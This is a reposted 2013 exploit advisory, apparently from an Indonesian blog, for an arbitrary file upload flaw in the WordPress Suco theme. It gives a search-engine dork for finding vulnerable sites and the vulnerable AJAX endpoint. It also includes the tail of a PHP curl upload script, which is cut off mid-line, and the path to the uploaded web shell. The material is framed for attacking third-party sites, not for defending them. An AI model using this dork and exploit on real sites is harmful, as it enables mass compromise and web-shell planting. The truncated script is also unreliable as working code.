Support By :


http://vyzewitch.blogspot.com/

http://vyzewitch.blogspot.com/

Wordpress Suco Themes Arbitrary File Upload

#Title : Wordpress Suco Themes Arbitrary File Upload 

#Author : DevilScreaM

#Date : 11/20/2013 - 20 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themify.me/

#Link : http://themify.me/themes/suco

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
    Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : Arbitrary File Upload

#Dork :

inurl:wp-content/themes/suco


Arbitrary File Upload

Exploit : http://SITE-TARGET/wp-content/themes/suco/themify/themify-ajax.php

Script :

"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Shell Access :

http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php

Penulis : Ferry PG ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Wordpress Suco Themes Arbitrary File Upload ini dipublish oleh Ferry PG pada hari 25 Nov 2013. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Wordpress Suco Themes Arbitrary File Upload
 

0 komentar: